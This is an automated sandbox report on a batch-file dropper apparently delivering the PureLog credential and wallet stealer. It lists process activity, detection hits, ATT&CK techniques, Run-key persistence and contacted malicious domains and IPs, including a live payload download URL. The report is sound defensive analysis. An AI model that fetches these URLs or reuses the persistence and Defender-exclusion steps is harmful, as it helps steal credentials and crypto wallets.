            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected PureLog Stealer
            Source: Yara matchFile source: 11.2.RuntimeBroker.exe.1c600000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3303350593.000000001C600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
            Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty@fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus Web3@jiidiaalihmmhddjgbnbgdfflelocpak
            Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
            Source: RuntimeBroker.exe, 0000000B.00000002.3303350593.000000001C600000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore

            Remote Access Functionality

            barindex
            Yara detected PureLog Stealer
            Source: Yara matchFile source: 11.2.RuntimeBroker.exe.1c600000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3303350593.000000001C600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting            		Valid Accounts11
            Windows Management Instrumentation            		11
            Scripting            		1
            DLL Side-Loading            		11
            Disable or Modify Tools            		OS Credential Dumping13
            System Information Discovery            		Remote Services11
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		11
            Process Injection            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory211
            Security Software Discovery            		Remote Desktop Protocol1
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            PowerShell            		1
            Registry Run Keys / Startup Folder            		1
            Registry Run Keys / Startup Folder            		2
            Obfuscated Files or Information            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCron1
            Services File Permissions Weakness            		1
            Services File Permissions Weakness            		22
            Software Packing            		NTDS41
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Timestomp            		LSA Secrets1
            Application Window Discovery            		SSHKeylogging3
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Masquerading            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
            Virtualization/Sandbox Evasion            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
            Process Injection            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            Services File Permissions Weakness            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1488895 Sample: temp_script.bat Startdate: 06/08/2024 Architecture: WINDOWS Score: 100 31 funcaptcha.ru 2->31 33 strompreis.ru 2->33 39 Antivirus detection for URL or domain 2->39 41 Antivirus detection for dropped file 2->41 43 Multi AV Scanner detection for dropped file 2->43 45 14 other signatures 2->45 9 cmd.exe 2 2->9         started        signatures3 process4 signatures5 47 Suspicious powershell command line found 9->47 49 Tries to download and execute files (via powershell) 9->49 51 Adds a directory exclusion to Windows Defender 9->51 12 RuntimeBroker.exe 3 9->12         started        17 powershell.exe 23 9->17         started        19 powershell.exe 14 16 9->19         started        21 6 other processes 9->21 process6 dnsIp7 35 strompreis.ru 45.11.229.96, 49705, 49712, 49714 ALPHAONE-ASUS Germany 12->35 27 C:\Users\user\AppData\...\RuntimeBroker.exe, PE32 12->27 dropped 53 Antivirus detection for dropped file 12->53 55 Multi AV Scanner detection for dropped file 12->55 57 Suspicious powershell command line found 12->57 63 2 other signatures 12->63 23 powershell.exe 12->23         started        59 Loading BitLocker PowerShell Module 17->59 61 Powershell drops PE file 17->61 37 funcaptcha.ru 188.114.96.3, 443, 49704 CLOUDFLARENETUS European Union 19->37 29 C:\Users\user\AppData\...\RuntimeBroker.exe, PE32 19->29 dropped file8 signatures9 process10 process11 25 conhost.exe 23->25         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            temp_script.bat5%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\RuntimeBroker.exe100%AviraTR/Dropper.MSIL.Gen
            C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe100%AviraTR/Dropper.MSIL.Gen
            C:\Users\user\AppData\Roaming\RuntimeBroker.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe66%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
            C:\Users\user\AppData\Roaming\RuntimeBroker.exe66%ReversingLabsByteCode-MSIL.Trojan.Jalapeno

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
            https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://oneget.orgX0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://funcaptcha.ru/hvnc.exe100%Avira URL Cloudmalware
            https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll0%Avira URL Cloudsafe
            https://stackoverflow.com/q/2152978/23354rCannot0%Avira URL Cloudsafe
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe0%Avira URL Cloudsafe
            https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            funcaptcha.ru
            		188.114.96.3
            		truetrue
              		unknown
              strompreis.ru
              		45.11.229.96
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://funcaptcha.ru/hvnc.exetrue
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.2227962406.0000028B2B76F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2227962406.0000028B2B8A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://stackoverflow.com/q/14436606/23354RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000C.00000002.2209055197.0000028B1B921000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000C.00000002.2209055197.0000028B1B921000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://stackoverflow.com/q/2152978/23354rCannotRuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://stackoverflow.com/q/11564914/23354;RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/powershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.2227962406.0000028B2B76F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2227962406.0000028B2B8A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dllRuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://oneget.orgXpowershell.exe, 0000000C.00000002.2209055197.0000028B1CF2F000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://aka.ms/pscore68powershell.exe, 0000000C.00000002.2209055197.0000028B1B6F1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.2209055197.0000028B1B6F1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://github.com/Pester/Pesterpowershell.exe, 0000000C.00000002.2209055197.0000028B1B921000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exeRuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exeRuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                188.114.96.3
                		funcaptcha.ruEuropean Union
                		13335CLOUDFLARENETUStrue
                45.11.229.96
                		strompreis.ruGermany
                		397525ALPHAONE-ASUSfalse

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1488895
                Start date and time:2024-08-06 18:11:06 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 18s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:16
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:temp_script.bat
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winBAT@21/28@2/2
                EGA Information:Failed
                HCA Information:Failed
                Cookbook Comments:
                • Found application associated with file extension: .bat

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target RuntimeBroker.exe, PID 5676 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 2200 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: temp_script.bat

                Simulations

                Behavior and APIs

                TimeTypeDescription
                12:11:58API Interceptor90x Sleep call for process: powershell.exe modified
                18:12:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker C:\Users\user\AppData\Roaming\RuntimeBroker.exe
                18:12:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker C:\Users\user\AppData\Roaming\RuntimeBroker.exe

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                188.114.96.3Exv453QQIX.exeGet hashmaliciousFormBookBrowse
                • www.bzfowe.shop/q0z8/
                XpADYjOsY5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                • 283743cm.nyashka.top/LinePythonhttpcpuApiFlowerprivatecdn.php
                Narud#U017ebenica 08BIH2024.exeGet hashmaliciousFormBookBrowse
                • www.qqkartel88v1.com/md02/?Q0GDHL=SVcP4HZHyROl5&V41t=v/CEznv/hMaH4fwWFhy7ytukhIx2w22qOwaWtBuVPfDrtHo+17oXaaCjpEIIGzDN6UQoQUlMzQ==
                Shipment Files EG240711& EG240712.exeGet hashmaliciousFormBookBrowse
                • www.orderdiscountspot.shop/0cdq/
                1V7IyYBdV7.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                • 411260cm.nyashka.top/SecureCpumultilinuxflowerDatalifeWpdle.php
                1.exeGet hashmaliciousUnknownBrowse
                • www.htdlq.com/bmd.txt
                CNvMbuoe5h.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                • 234671cm.nyashka.top/ProviderphphttppacketProcessorGameBigloadDlePublicprivate.php
                vsKkgKIVLm.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                • 849188cm.nyashka.top/GeoCpulongpollApibigloadBaseasyncTrack.php
                QUOTATION_AUGQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • filetransfer.io/data-package/HOdxDWTu/download
                6ddrUd6iQo.exeGet hashmaliciousFormBookBrowse
                • www.hpo0snermcvqv.xyz/nxj8/
                45.11.229.964FwNHRnnXb.exeGet hashmaliciousPureLog StealerBrowse

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  strompreis.ru4FwNHRnnXb.exeGet hashmaliciousPureLog StealerBrowse
                  • 45.11.229.96

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  CLOUDFLARENETUShttp://g31099240595.co/grGet hashmaliciousUnknownBrowse
                  • 1.1.1.1
                  445_Settlement_Legal_Transcription.pdfGet hashmaliciousHTMLPhisherBrowse
                  • 188.114.97.3
                  https://grizzlyreports.com/wp-content/uploads/2019/12/Trulieve-Report-.pdfGet hashmaliciousUnknownBrowse
                  • 188.114.96.3
                  RFQ Hail & Ghasha Project.exeGet hashmaliciousFormBookBrowse
                  • 188.114.97.3
                  phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                  • 1.1.1.1
                  Packing List.exeGet hashmaliciousSnake KeyloggerBrowse
                  • 188.114.97.3
                  Upgraded_Detail_PayslipCC886DC7C7E1_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 104.17.25.14
                  https://qr-online.pl/go/7327y3pInd6HDYmhGet hashmaliciousUnknownBrowse
                  • 188.114.96.3
                  Import Details.exeGet hashmaliciousSnake KeyloggerBrowse
                  • 188.114.96.3
                  Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                  • 188.114.96.3
                  ALPHAONE-ASUSAqua.mpsl-20240804-2157.elfGet hashmaliciousUnknownBrowse
                  • 45.13.227.24
                  Aqua.arm7-20240804-2157.elfGet hashmaliciousMiraiBrowse
                  • 45.13.227.24
                  Aqua.mips-20240804-2157.elfGet hashmaliciousUnknownBrowse
                  • 45.13.227.24
                  Aqua.x86_64-20240804-2157.elfGet hashmaliciousUnknownBrowse
                  • 45.13.227.24
                  sora.m68k.elfGet hashmaliciousMiraiBrowse
                  • 38.79.86.219
                  ca1b58Nxwf.elfGet hashmaliciousUnknownBrowse
                  • 45.13.227.201
                  GWtByYqyGD.elfGet hashmaliciousUnknownBrowse
                  • 45.13.227.201
                  nWlbyBDOUp.elfGet hashmaliciousUnknownBrowse
                  • 45.13.227.201
                  TIzx8Y748C.elfGet hashmaliciousUnknownBrowse
                  • 45.13.227.201
                  RTPfbe5mRB.elfGet hashmaliciousUnknownBrowse
                  • 45.13.227.201

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  3b5074b1b5d032e5620f69f9f700ff0ehttps://grizzlyreports.com/wp-content/uploads/2019/12/Trulieve-Report-.pdfGet hashmaliciousUnknownBrowse
                  • 188.114.96.3
                  Upgraded_Detail_PayslipCC886DC7C7E1_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 188.114.96.3
                  D2MCMOElH7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                  • 188.114.96.3
                  34vq3VDWVn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • 188.114.96.3
                  ZUpK81URgS.exeGet hashmaliciousAgentTeslaBrowse
                  • 188.114.96.3
                  Dw8DmNycf5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                  • 188.114.96.3
                  bFeHdojh20.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • 188.114.96.3
                  sGQvbGSADU.exeGet hashmaliciousAgentTeslaBrowse
                  • 188.114.96.3
                  VLp3BJZN82.exeGet hashmaliciousAgentTeslaBrowse
                  • 188.114.96.3
                  SijLVTsunN.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 188.114.96.3

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe4FwNHRnnXb.exeGet hashmaliciousPureLog StealerBrowse
                    C:\Users\user\AppData\Roaming\RuntimeBroker.exe4FwNHRnnXb.exeGet hashmaliciousPureLog StealerBrowse

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):64
                      Entropy (8bit):0.34726597513537405
                      Encrypted:false
                      SSDEEP:3:Nlll:Nll
                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                      Malicious:false
                      Preview:@...e...........................................................

                      C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):449024
                      Entropy (8bit):7.990550406581685
                      Encrypted:true
                      SSDEEP:6144:4hE8FrC1mJDf1nkhf2TO1WGf+CXhJyBl6mVLdWYrS+ZbHegrrHW3JkGYhtoLQvlN:1mHmEOQGZv+Zb33HMYHoLQrdQq
                      MD5:7557AF6F3185128C25AEB092DC335975
                      SHA1:F0866402529BE2FDC0511305DA069B69A8A35B8E
                      SHA-256:5FCEE9DA2E237DF74B7C2619BDE63DB40C92C2E6C51BD483C86F83DCDFDE1EAB
